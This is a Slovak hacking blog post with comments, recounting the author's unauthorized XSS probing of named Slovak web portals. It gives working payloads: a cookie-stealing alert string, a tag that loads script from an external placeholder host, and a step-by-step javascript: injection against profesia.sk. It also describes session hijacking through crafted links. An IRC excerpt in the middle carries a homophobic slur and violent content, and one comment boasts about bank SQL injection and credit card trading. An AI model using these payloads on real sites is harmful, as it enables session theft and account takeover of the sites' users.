WebSupport.sk
UnlimitedHosting
|
CustomHosting
|
FreeWeb.sk
Dnes som sa v skorych rannych hodinach (do tej pol siestej) hrabal po SK nete, kedze na mojom "mega rychlom" 256kb/s pripojeni to vtedy facha o nieco sviznejsie a zistenie, ku ktoremu som sa dopracoval ma naozaj zarazilo.
Tento clanok je len na studijne ucely, a autor nezdopoveda za nic.
Ak si niekto mysli, ze velke slovenske portaly boli kodene "with security in mind" tymto ho vyvediem z omylu. Sice som "objavil teplu vodu", ale aj tak prehlad znamejsich stranok nachylnych na XSS nezaskodi.
Testovane weby:
www.zoznam.sk
www.bleskovky.sk
www.pokec.sk
www.azet.sk
www.najdes.sk
www.orangeportal.sk
www.profesia.sk
www.itas.sk
www.zive.sk
--------
www.atlas.sk
www.centrum.sk
www.itnews.sk
Zoznam.sk
Tento portal ma zarazil asi najviac, kedze je dost navstevovany na SK webe. Po zadany stringu do vyhladavacieho formu:
"<script>alert(document.cookie)</script>
na nas, bez akychkolvek problemov parkrat (pre kazdu kategoriu zvlast - zoznam, slovensko, svet, telefonnny zoznam atd) vyskoci alert, az kym sa nenalouduje cela stranka. Ziadne prevadzanie specialnych znakov na ich HTML entity, ziadne escape sekvencie, nic co by kontrolovalo vstup zadany uzivatelom. Takto napriklad mozme do stranky vlozit hociaky HTML tag, ale aj script (nemusi to byt len javascript):
"<script src=http://server.tld/script.js>
Pre rychle odskusanie: zoznam.sk
Bleskovky.sk su na tom rovnako. A nakoniec vsetky domeny co vlastni zoznam tiez.
Pokec.sk
Tu ma to ani neprekvapilo, kedze je vseobecne zname, ze pokec nie je prave najbezpecnejsie miesto na oddych na webe:
1. Odchytavanie session
2. Dost dlho moznost registracie dlhych nickov za pomoci js injection (konecne to je osetrene na strane serveru..)
3. Debilni useri, ktory napomahaju vyuzivat dalsie slabiny =)
4. atd..
XSS sa na pokeci da vyuzit uz pri prihlasovani do accountu, staci tak, ako v predoslom pripade zadat:
"<script>alert(document.cookie)</script>
do inputu Azet ID. Heslo kludne mozeme nechat prazdne, odklepneme form a alert je tu zas. S vlozenim scriptu z inej url, je to rovnako.
Dalsie miesto kde sa da takisto vyuzit XSS je vyhladavanie uzivatelov, taktiez ziadna kontrola user vstupu, ale nevadi, hlavne ze koderi pokecu dostavaju $$.
Ti co vedia ako odchytavat session zaslanim emailu s javascriptom, by o lamerskom kodeni "pokecarov" mohli pisat slohy. Tam je dalsia slabina pokecu a da sa povedat ze najvaznejsia, ale nakoniec tusim tu uz o tom bolo pisane.
Zvlastne ale je, ze na samotnej domene www.azet.sk, je vstup uzivatela osetreny. To ma len utvrdzuje v tom, ze pokec.sk kodia male deti, co vedia o bezpecnosti webovych aplikacii, asi tak ako ja o zbere ryze v cine.
Najdes.sk
O tomto slovenskom vyhladavaci podla mna vela ludi asi nevie, ale v googli pri zadani slova portal, som ho nasiel na stvrtom mieste, tak zas az taky neznamy nebude.
Osud mu tiez nedoprial najlepsich koderov, hore uvedene metody funguju aj tu, ale tvorcovia tohto webu, si zasluzia aspon male bezvyznamne plus, pretoze nebezpecne znaky nahradzuju escape sekvenciami.
Orangeportal.sk
V googli pri zadani slova portal je na prvom mieste, tak som sa pozrel aj na neho. Skusal som zadat rozne kombinacie nebezpecnych znakov, html tagov a podobne ale aj vyhladavac aj prihlasovanie do accountu krasne osetrene. Uz som sa chcel vzdat, ale v tom ma napadlo, "co tak skusist registraciu?". Hned do prveho inputu "Moje používateľské meno" som zadal znaky: " ' \ a ked som po odoslani formularu zistil, ze script ich nenahradil escape sekvenciami, hned ma presla radost a zacal som si mysliet, ze na SK webe uz naozaj neexistuje pekne nakodena web aplikacia. Sazmozrejme alert a vlozenie scriptu fungovalo aj tu.
Profesia.sk
Tu mi trvalo trosku dlhsie, nez som sa k uspesnemu XSS utoku dopracoval, ale nakoniec sa podarilo. Bolo treba pouzit aj javascript injection, tak podme na to.
Najprv vyuzijeme spominanu js injekciu, teda chodte na registracnu stranku a vlozte do nej tento js kod:
javascript: void(document.forms[1].onsubmit="return false"); void(document.forms[1].elements[6].value="\"<script>alert(document.cookie)</script>"); void(document.forms[1].elements[7].value="a"); void(document.forms[1].elements[8].value="b"); void(document.forms[1].submit);
Po odoslani formularu na nas vyskoci alert s tym, ze sa hesla nezhoduju, nevadi dajte OK a este raz dajte v address bare enter, a znova odoslite form. Po odoslani na nas vyskoci dalsi alert, ale uz aj s nasimi cookies.
Aspon ze sa nahradzuju nebezpecne znaky, to ale nic nemeni na fakte, ze je to jeden z dalsich nie najlepsie osetrenych velkych slovenskych webov.
ITas.sk
Lol, no paradox co vam poviem, stranka asociacie, ktora sa snazi dostat IT do popredia, rozprava aj o IT security, bezi na starom buxuse (tu je hlavne ten paradox) a je nachylna na XSS. Staci do vyhladavacieho formulara zadat nas osvedceni string a hadajte co sa stane ;)
Zive.sk
Tu som sa k XSS nedopracoval, ale ked som zadal do vyhladavania nebezpecne znaky, tak na mna vyskocila SQL chyba, cize teoreticky by sa dala nejaka dierka hladat aj tam, ale to uz sem nepatri.
Po par hodinach skusania roznych webov (nie vsetky som sem zahrnul), plny zufalstva som to uz chcel zabalit, ale rozhodol som sa este otestovat Atlas.sk, jedine co mi tam vadilo, pri vlozeni:
"<script>alert(document.cookie)</script>
do http://registracia.atlas.sk/ bolo, ze vyhodilo dost hodnotny server error, kde bolo vypisane Source File a Version Information, ale inak som celkom spokojny.
Centrum.sk
Tento server ma potesil asi najviac zo vsetkych testovanych, vsetko krasne osetrene, ci vyhladavanie, ci registracia atd. Jeho programatori si zasluzia aj 15-ty plat :D
ITnews.sk
Tu je redakcny system buxus, imho pravidelne updatovany, cize tu sa mi nepodarilo najst ziadnu "dierku" ohladne XSS.
Zaver
Zaver je asi taky, ze velke spolocnosti platia "tazke" $$ da sa povedat len za tu omalovanku co vidime, vo vnutri je ale situacia ina a pravdepodobne to ani nikoho netrapi, hlavne ze za par noci zbuchali site a teraz z pocitom dobre vykonanej prace zarabaju cash. Ale to, ze na niektorych z tych serverov mozu mat koncovi uzivatelia aj citlive data, nezaujima nikoho. Dakujem pekne za take sluzby.
V tomto clanku nejde len o tych par "trapnych" XSS kodov, ide o to ze ich kombinovanim, a pouzitim na spravnych miestach, moze utocnik odchytavat sedenia, tym padom sa moze vydavat za obet (moze citat jej postu atd..). Videl som uz aj naklepany javascript keylogger, takze vyuzite XSS je naozaj siroke.
P.S. To ze na tych par weboch som nenasiel ziadne naznaky po uspesnych XSS utokoch, neznamena, ze tam nie su.
<sixeR> KURVA
<sixeR> zaspal som na posteli, zaspal
<sixeR> a zobudil som sa tak, ze pod sebou vidim kaluz krvi, nadomnou otec
<sixeR> a rozjebay xicht
<kab-el> ??
<kab-el> ti rozbil ksicht ked zistil, ze si buzerant?
<sixeR> kabel ty kokot :D
<sixeR> ja tu mam ohrozenie zivota 3000, strata krvi
<sixeR> lahky otras mozgu pomaly
|
webhosting by:
WebSupport.sk
|
UnlimitedHosting | CustomHosting | FreeWeb.sk |
Comments
Re: Na potulkach po (ne)bezpecnych slovenskych weboch
Nice TommyHot. Neni co dodat proste. Pekne a vo velkom.
Re: Na potulkach po (ne)bezpecnych slovenskych weboch
Pekna praca treba uznat :))) fakt nemas co robit(okrem porna) :)
--
TxX
Re: Na potulkach po (ne)bezpecnych slovenskych weboch
Thx, no porno nemam priatelka mi vymazala :D (cca 30GB) tak mi neostava nist ine, nez toto :)
Re: Na potulkach po (ne)bezpecnych slovenskych weboch
good work, len tak dalej
Re: Na potulkach po (ne)bezpecnych slovenskych weboch
tommy - http://emdi.sk/blog:31:vybrali.sme.sk_hacknute-
niet co dodat
*********************************
debian user | www.emdi.sk
*********************************
Re: Na potulkach po (ne)bezpecnych slovenskych weboch
a co presne ti neslo/slo na najdes.sk? mna sa mi nepodarilo to o com tu pises
Re: Na potulkach po (ne)bezpecnych slovenskych weboch
Na najdes.sk mi vsetko islo.. Skusal som len aby mi vyhodil Alert() s mojimi cookies a skusal som tam vlozit javascript. Vsetko fachalo..
Len ma mrzi, ze ti co sa k clanku vyjadrovali na itnews, nevidia vyuzitie v praxi a myslia si ze takyto kod bezpodmienecne musi byt ulozeni v db, aby bol nebezpecny aj pre usera. Ale jedine co staci, je presmerovat (poslat js email, ktory sa o vsetko postara) uzivatela na takuto URL (pokym su parametre predavane cez GET) a to co vlozime do scriptu je uz na nas..
Btw ked ti to nejde, tak skontroluj ci si tam dal aj uvodzovky. A skusaj to cez Firefox, lebo na opere to vraj nejde..
----------
tommyhot@hackingmachine:~$ microsoft &> /dev/null
Re: Na potulkach po (ne)bezpecnych slovenskych weboch
No reakcie ITnews ber z nadhladom.
Osobne ma sfuklo par ludi za nieco s cim denne robim :)
V opere to nejde len pod 9. nizsia verzia ide. A IE no comment
----------------------------------------
Hlúposť užívateľa je úmerná jeho právam.
Re: Na potulkach po (ne)bezpecnych slovenskych weboch
No ja uz dlhsie mam pocit, ze tam nechodia odbornici ako kedysi, ale teraz uz len zakomplexovane lamy, ktore proste musia picovat a robit sa velkymi háčkarmi..
----------
tommyhot@hackingmachine:~$ microsoft &> /dev/null
Re: Na potulkach po (ne)bezpecnych slovenskych weboch
Na dsl.sk to obvykle vyzera este horsie ...
Re: Na potulkach po (ne)bezpecnych slovenskych weboch
na portal blackhole.sk si zabudol? ;)
Re: Na potulkach po (ne)bezpecnych slovenskych weboch
Nezabudol, niektore weby, ktore som testoval som sem nedal a skus aj tak hadat aky bol vysledok pre blackhole =)
----------
tommyhot@hackingmachine:~$ microsoft &> /dev/null
Re: Na potulkach po (ne)bezpecnych slovenskych weboch
Tak ako sme sa bavili je to vonku ;)
Trochu zdvihneme navstevnost BH :)
----------------------------------------
Hlúposť užívateľa je úmerná jeho právam.
Re: Na potulkach po (ne)bezpecnych slovenskych weboch
by si sa cudoval co vsetko uvidis ak sa das na pentesty alebo tak. banky ktore zaplatili za sek u riti tazke prachy a hovno z toho. nechcem menovat ale sql injection zbuchana za 10 minut je pre nemenovanu banku zly vysledok. najma ked kreditky su taky fajn obchodny artikel.